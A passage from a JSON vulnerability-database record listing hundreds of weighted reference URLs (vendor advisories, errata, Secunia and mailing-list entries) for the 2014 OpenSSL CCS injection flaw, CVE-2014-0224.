        "trust": 1.9,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676071"
      },
      {
        "trust": 1.9,
        "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095757"
      },
      {
        "trust": 1.9,
        "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095756"
      },
      {
        "trust": 1.9,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676833"
      },
      {
        "trust": 1.9,
        "url": "https://kb.bluecoat.com/index?page=content\u0026id=sa80"
      },
      {
        "trust": 1.9,
        "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10075"
      },
      {
        "trust": 1.9,
        "url": "http://www.fortiguard.com/advisory/fg-ir-14-018/"
      },
      {
        "trust": 1.9,
        "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20140605-openssl"
      },
      {
        "trust": 1.9,
        "url": "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html"
      },
      {
        "trust": 1.9,
        "url": "http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html"
      },
      {
        "trust": 1.9,
        "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html"
      },
      {
        "trust": 1.9,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html"
      },
      {
        "trust": 1.9,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1020172"
      },
      {
        "trust": 1.9,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675626"
      },
      {
        "trust": 1.9,
        "url": "http://rhn.redhat.com/errata/rhsa-2014-0630.html"
      },
      {
        "trust": 1.9,
        "url": "http://rhn.redhat.com/errata/rhsa-2014-0631.html"
      },
      {
        "trust": 1.9,
        "url": "http://rhn.redhat.com/errata/rhsa-2014-0633.html"
      },
      {
        "trust": 1.9,
        "url": "http://rhn.redhat.com/errata/rhsa-2014-0632.html"
      },
      {
        "trust": 1.9,
        "url": "http://rhn.redhat.com/errata/rhsa-2014-0627.html"
      },
      {
        "trust": 1.9,
        "url": "http://rhn.redhat.com/errata/rhsa-2014-0680.html"
      },
      {
        "trust": 1.9,
        "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095755"
      },
      {
        "trust": 1.9,
        "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095754"
      },
      {
        "trust": 1.9,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21683332"
      },
      {
        "trust": 1.9,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677695"
      },
      {
        "trust": 1.9,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676644"
      },
      {
        "trust": 1.9,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676879"
      },
      {
        "trust": 1.9,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676529"
      },
      {
        "trust": 1.9,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677836"
      },
      {
        "trust": 1.9,
        "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095740"
      },
      {
        "trust": 1.9,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676501"
      },
      {
        "trust": 1.9,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676035"
      },
      {
        "trust": 1.9,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677828"
      },
      {
        "trust": 1.9,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673137"
      },
      {
        "trust": 1.9,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676419"
      },
      {
        "trust": 1.9,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677131"
      },
      {
        "trust": 1.9,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676496"
      },
      {
        "trust": 1.9,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676478"
      },
      {
        "trust": 1.9,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676062"
      },
      {
        "trust": 1.9,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24037731"
      },
      {
        "trust": 1.9,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24037732"
      },
      {
        "trust": 1.9,
        "url": "http://www.kb.cert.org/vuls/id/978508"
      },
      {
        "trust": 1.7,
        "url": "http://security.gentoo.org/glsa/glsa-201407-05.xml"
      },
      {
        "trust": 1.6,
        "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05301946"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59661"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59301"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59300"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59784"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59413"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59655"
      },
      {
        "trust": 1.6,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/60522"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59659"
      },
      {
        "trust": 1.6,
        "url": "http://marc.info/?l=bugtraq\u0026m=140317760000786\u0026w=2"
      },
      {
        "trust": 1.6,
        "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-234763.pdf"
      },
      {
        "trust": 1.6,
        "url": "http://marc.info/?l=bugtraq\u0026m=141383465822787\u0026w=2"
      },
      {
        "trust": 1.6,
        "url": "https://access.redhat.com/site/blogs/766093/posts/908133"
      },
      {
        "trust": 1.6,
        "url": "http://marc.info/?l=bugtraq\u0026m=140784085708882\u0026w=2"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59310"
      },
      {
        "trust": 1.6,
        "url": "http://linux.oracle.com/errata/elsa-2014-1053.html"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59666"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/58337"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/58579"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59305"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59306"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59669"
      },
      {
        "trust": 1.6,
        "url": "http://dev.mysql.com/doc/relnotes/workbench/en/wb-news-6-1-7.html"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59429"
      },
      {
        "trust": 1.6,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676333"
      },
      {
        "trust": 1.6,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676334"
      },
      {
        "trust": 1.6,
        "url": "http://ccsinjection.lepidum.co.jp"
      },
      {
        "trust": 1.6,
        "url": "http://support.apple.com/kb/ht6443"
      },
      {
        "trust": 1.6,
        "url": "http://marc.info/?l=bugtraq\u0026m=140266410314613\u0026w=2"
      },
      {
        "trust": 1.6,
        "url": "http://marc.info/?l=bugtraq\u0026m=140852757108392\u0026w=2"
      },
      {
        "trust": 1.6,
        "url": "http://www14.software.ibm.com/webapp/set2/subscriptions/pqvcmjd?mode=18\u0026id=6061\u0026myns=phmc\u0026mync=e"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/58667"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59514"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59878"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59518"
      },
      {
        "trust": 1.6,
        "url": "http://marc.info/?l=bugtraq\u0026m=140870499402361\u0026w=2"
      },
      {
        "trust": 1.6,
        "url": "http://www.blackberry.com/btsc/kb36051"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/60066"
      },
      {
        "trust": 1.6,
        "url": "http://marc.info/?l=bugtraq\u0026m=141025641601169\u0026w=2"
      },
      {
        "trust": 1.6,
        "url": "http://marc.info/?l=bugtraq\u0026m=140386311427810\u0026w=2"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59093"
      },
      {
        "trust": 1.6,
        "url": "http://www.websense.com/support/article/kbarticle/vulnerabilities-resolved-in-triton-apx-version-8-0"
      },
      {
        "trust": 1.6,
        "url": "http://lists.opensuse.org/opensuse-updates/2015-02/msg00030.html"
      },
      {
        "trust": 1.6,
        "url": "http://marc.info/?l=bugtraq\u0026m=140369637402535\u0026w=2"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59530"
      },
      {
        "trust": 1.6,
        "url": "http://www.novell.com/support/kb/doc.php?id=7015264"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59894"
      },
      {
        "trust": 1.6,
        "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-august/136470.html"
      },
      {
        "trust": 1.6,
        "url": "http://seclists.org/fulldisclosure/2014/jun/38"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/58433"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59885"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59525"
      },
      {
        "trust": 1.6,
        "url": "https://filezilla-project.org/versions.php?type=server"
      },
      {
        "trust": 1.6,
        "url": "http://marc.info/?l=bugtraq\u0026m=141147110427269\u0026w=2"
      },
      {
        "trust": 1.6,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677567"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59529"
      },
      {
        "trust": 1.6,
        "url": "https://www.intersectalliance.com/wp-content/uploads/release_notes/releasenotes_for_snare_for_mssql.pdf"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59528"
      },
      {
        "trust": 1.6,
        "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2014:105"
      },
      {
        "trust": 1.6,
        "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2014:106"
      },
      {
        "trust": 1.6,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2015-03/msg00027.html"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59063"
      },
      {
        "trust": 1.6,
        "url": "http://marc.info/?l=bugtraq\u0026m=141383410222440\u0026w=2"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59186"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59189"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/61815"
      },
      {
        "trust": 1.6,
        "url": "http://marc.info/?l=bugtraq\u0026m=140604261522465\u0026w=2"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59188"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/60049"
      },
      {
        "trust": 1.6,
        "url": "http://marc.info/?l=bugtraq\u0026m=140544599631400\u0026w=2"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/61254"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59190"
      },
      {
        "trust": 1.6,
        "url": "http://marc.info/?l=bugtraq\u0026m=140431828824371\u0026w=2"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59192"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59191"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59990"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/58660"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59502"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59506"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/60176"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59040"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59282"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59163"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59284"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59162"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59043"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59167"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59287"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/58742"
      },
      {
        "trust": 1.6,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676845"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/58743"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/58745"
      },
      {
        "trust": 1.6,
        "url": "http://rhn.redhat.com/errata/rhsa-2014-0624.html"
      },
      {
        "trust": 1.6,
        "url": "https://www.imperialviolet.org/2014/06/05/earlyccs.html"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59055"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59175"
      },
      {
        "trust": 1.6,
        "url": "http://marc.info/?l=bugtraq\u0026m=140794476212181\u0026w=2"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59721"
      },
      {
        "trust": 1.6,
        "url": "http://marc.info/?l=bugtraq\u0026m=140482916501310\u0026w=2"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59602"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/58759"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/58639"
      },
      {
        "trust": 1.6,
        "url": "http://marc.info/?l=bugtraq\u0026m=140621259019789\u0026w=2"
      },
      {
        "trust": 1.6,
        "url": "http://www14.software.ibm.com/webapp/set2/subscriptions/pqvcmjd?mode=18\u0026id=6060\u0026myns=phmc\u0026mync=e"
      },
      {
        "trust": 1.6,
        "url": "http://marc.info/?l=bugtraq\u0026m=142350350616251\u0026w=2"
      },
      {
        "trust": 1.6,
        "url": "http://www.securitytracker.com/id/1031032"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59380"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59383"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59264"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59142"
      },
      {
        "trust": 1.6,
        "url": "http://marc.info/?l=bugtraq\u0026m=141658880509699\u0026w=2"
      },
      {
        "trust": 1.6,
        "url": "http://rhn.redhat.com/errata/rhsa-2014-0626.html"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59389"
      },
      {
        "trust": 1.6,
        "url": "http://marc.info/?l=bugtraq\u0026m=140983229106599\u0026w=2"
      },
      {
        "trust": 1.6,
        "url": "http://www.splunk.com/view/sp-caaam2d"
      },
      {
        "trust": 1.6,
        "url": "http://marc.info/?l=bugtraq\u0026m=140491231331543\u0026w=2"
      },
      {
        "trust": 1.6,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677390"
      },
      {
        "trust": 1.6,
        "url": "http://www.kerio.com/support/kerio-control/release-history"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/60819"
      },
      {
        "trust": 1.6,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24037729"
      },
      {
        "trust": 1.6,
        "url": "http://seclists.org/fulldisclosure/2014/dec/23"
      },
      {
        "trust": 1.6,
        "url": "http://marc.info/?l=bugtraq\u0026m=140904544427729\u0026w=2"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/58977"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59824"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/58615"
      },
      {
        "trust": 1.6,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1103586"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59827"
      },
      {
        "trust": 1.6,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=isg400001843"
      },
      {
        "trust": 1.6,
        "url": "https://www.arista.com/en/support/advisories-notices/security-advisories/941-security-advisory-0005"
      },
      {
        "trust": 1.6,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=isg400001841"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59120"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59362"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59483"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59365"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59364"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59004"
      },
      {
        "trust": 1.6,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00011.html"
      },
      {
        "trust": 1.6,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676889"
      },
      {
        "trust": 1.6,
        "url": "http://marc.info/?l=bugtraq\u0026m=140448122410568\u0026w=2"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/58945"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59916"
      },
      {
        "trust": 1.6,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2015-04/msg00016.html"
      },
      {
        "trust": 1.6,
        "url": "http://esupport.trendmicro.com/solution/en-us/1103813.aspx"
      },
      {
        "trust": 1.6,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1iv61506"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59370"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59491"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59490"
      },
      {
        "trust": 1.6,
        "url": "http://puppetlabs.com/security/cve/cve-2014-0224"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59132"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59374"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59495"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59012"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59375"
      },
      {
        "trust": 1.6,
        "url": "http://www.novell.com/support/kb/doc.php?id=7015300"
      },
      {
        "trust": 1.6,
        "url": "http://marc.info/?l=bugtraq\u0026m=140499864129699\u0026w=2"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59135"
      },
      {
        "trust": 1.6,
        "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-august/136473.html"
      },
      {
        "trust": 1.6,
        "url": "http://marc.info/?l=bugtraq\u0026m=142805027510172\u0026w=2"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59126"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59368"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/58713"
      },
      {
        "trust": 1.6,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1020163"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/58714"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/58716"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/58719"
      },
      {
        "trust": 1.6,
        "url": "http://www.securitytracker.com/id/1031594"
      },
      {
        "trust": 1.6,
        "url": "http://www.tenable.com/blog/nessus-527-and-pvs-403-are-available-for-download"
      },
      {
        "trust": 1.6,
        "url": "http://www.securityfocus.com/archive/1/534161/100/0/threaded"
      },
      {
        "trust": 1.6,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677080"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/58492"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59460"
      },
      {
        "trust": 1.6,
        "url": "https://www.intersectalliance.com/wp-content/uploads/release_notes/releasenotes_for_snare_for_windows.pdf"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59101"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59342"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59223"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59215"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/60567"
      },
      {
        "trust": 1.6,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004690"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59214"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/58128"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59338"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59459"
      },
      {
        "trust": 1.6,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676786"
      },
      {
        "trust": 1.6,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678289"
      },
      {
        "trust": 1.6,
        "url": "http://marc.info/?l=bugtraq\u0026m=142546741516006\u0026w=2"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59231"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59354"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/58385"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59347"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59589"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/60577"
      },
      {
        "trust": 1.6,
        "url": "http://marc.info/?l=bugtraq\u0026m=140852826008699\u0026w=2"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/58930"
      },
      {
        "trust": 1.6,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24037761"
      },
      {
        "trust": 1.6,
        "url": "http://marc.info/?l=bugtraq\u0026m=141164638606214\u0026w=2"
      },
      {
        "trust": 1.6,
        "url": "http://www.innominate.com/data/downloads/manuals/mdm_1.5.2.1_release_notes.pdf"
      },
      {
        "trust": 1.6,
        "url": "https://discussions.nessus.org/thread/7517"
      },
      {
        "trust": 1.6,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676536"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/58939"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/60571"
      },
      {
        "trust": 1.6,
        "url": "http://marc.info/?l=bugtraq\u0026m=140752315422991\u0026w=2"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59440"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59442"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59441"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59202"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59444"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59435"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59677"
      },
      {
        "trust": 1.6,
        "url": "http://marc.info/?l=bugtraq\u0026m=140389355508263\u0026w=2"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59437"
      },
      {
        "trust": 1.6,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24037870"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59438"
      },
      {
        "trust": 1.6,
        "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095737"
      },
      {
        "trust": 1.6,
        "url": "http://marc.info/?l=bugtraq\u0026m=140389274407904\u0026w=2"
      },
      {
        "trust": 1.6,
        "url": "https://www.novell.com/support/kb/doc.php?id=7015271"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59451"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59450"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59211"
      },
      {
        "trust": 1.6,
        "url": "https://www.ibm.com/support/docview.wss?uid=ssg1s1004670"
      },
      {
        "trust": 1.6,
        "url": "http://marc.info/?l=bugtraq\u0026m=140672208601650\u0026w=2"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59454"
      },
      {
        "trust": 1.6,
        "url": "https://www.ibm.com/support/docview.wss?uid=ssg1s1004671"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59325"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59446"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59445"
      },
      {
        "trust": 1.6,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677527"
      },
      {
        "trust": 1.6,
        "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2015:062"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59448"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59447"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/59449"
      },
      {
        "trust": 1.0,
        "url": "https://git.openssl.org/gitweb/?p=openssl.git%3ba=commit%3bh=bc8923b1ec9c467755cd86f7848c50ee8812e441"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0224"
      },
      {
        "trust": 0.6,
        "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commit;h=bc8923b1ec9c467755cd86f7848c50ee8812e441"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-201914246-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.0696"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4645/"
      },
      {
        "trust": 0.6,
        "url": "https://support.lenovo.com/us/en/solutions/len-24443"
      },
      {
        "trust": 0.5,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/"
      },
      {
        "trust": 0.5,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/"
      },
      {
        "trust": 0.5,
        "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins"
      },
      {
        "trust": 0.3,
        "url": "http://securityadvisories.dlink.com/security/publication.aspx?name=sap10045"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24032618"
      },
      {
        "trust": 0.3,
        "url": "http://www.sophos.com/en-us/support/knowledgebase/121112.aspx"
      },
      {
        "trust": 0.3,
        "url": "http://sylpheed.sraoss.jp/en/news.html"
      },
      {
        "trust": 0.3,
        "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10629\u0026cat=sirt_1\u0026actp=list\u0026showdraft=false"
      },
      {
        "trust": 0.3,
        "url": "http://www.arubanetworks.com/support/alerts/aid-06062014.txt"
      },
      {
        "trust": 0.3,
        "url": "http://googlechromereleases.blogspot.com/2014/06/chrome-for-android-update.html"
      },
      {
        "trust": 0.3,
        "url": "http://blogs.citrix.com/2014/06/06/citrix-security-advisory-for-openssl-vulnerabilities-june-2014/"
      },
      {
        "trust": 0.3,
        "url": "http://bugs.python.org/issue21671"
      },
      {
        "trust": 0.3,
        "url": "http://securityadvisories.dlink.com/security/publication.aspx?name=sap10046"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004805"
      },
      {
        "trust": 0.3,
        "url": "http://seclists.org/bugtraq/2014/aug/att-93/esa-2014-079.txt"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04438404"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21687640"
      },
      {
        "trust": 0.3,
        "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21682840"
      },
      {
        "trust": 0.3,
        "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21678123"
      },
      {
        "trust": 0.3,
        "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21678073"
      },
      {
        "trust": 0.3,
        "url": "http://www.websense.com/support/article/kbarticle/july-2014-hotfix-summary-for-websense-solutions"
      },
      {
        "trust": 0.3,
        "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10643\u0026cat=sirt_1\u0026actp=list"
      },
      {
        "trust": 0.3,
        "url": "http://jvn.jp/en/jp/jvn61247051/index.html"
      },
      {
        "trust": 0.3,
        "url": "http://openssl.org/"
      },
      {
        "trust": 0.3,
        "url": "http://blogs.sophos.com/2014/06/10/openssl-man-in-the-middle-vulnerability-sophos-product-status-2/"
      },
      {
        "trust": 0.3,
        "url": "https://downloads.avaya.com/css/p8/documents/100181245"
      },
      {
        "trust": 0.3,
        "url": "http://www.innominate.com/data/downloads/software/innominate_security_advisory_20140606_001_en.pdf"
      },
      {
        "trust": 0.3,
        "url": "https://www-304.ibm.com/support/docview.wss?uid=ssg1s1004758"
      },
      {
        "trust": 0.3,
        "url": "https://www-304.ibm.com/support/docview.wss?uid=ssg1s1004747"
      },
      {
        "trust": 0.3,
        "url": "http://openvpn.net/index.php/open-source/downloads.html"
      },
      {
        "trust": 0.3,
        "url": "http://www8.hp.com/us/en/software-solutions/operations-analytics-operations-analysis/"
      },
      {
        "trust": 0.3,
        "url": "http://www.ibm.com/support/docview.wss?uid=swg21686583"
      },
      {
        "trust": 0.3,
        "url": "https://community.rapid7.com/community/metasploit/blog/2014/06/05/security-advisory-openssl-vulnerabilities-cve-2014-0224-cve-2014-0221-in-metasploit"
      },
      {
        "trust": 0.3,
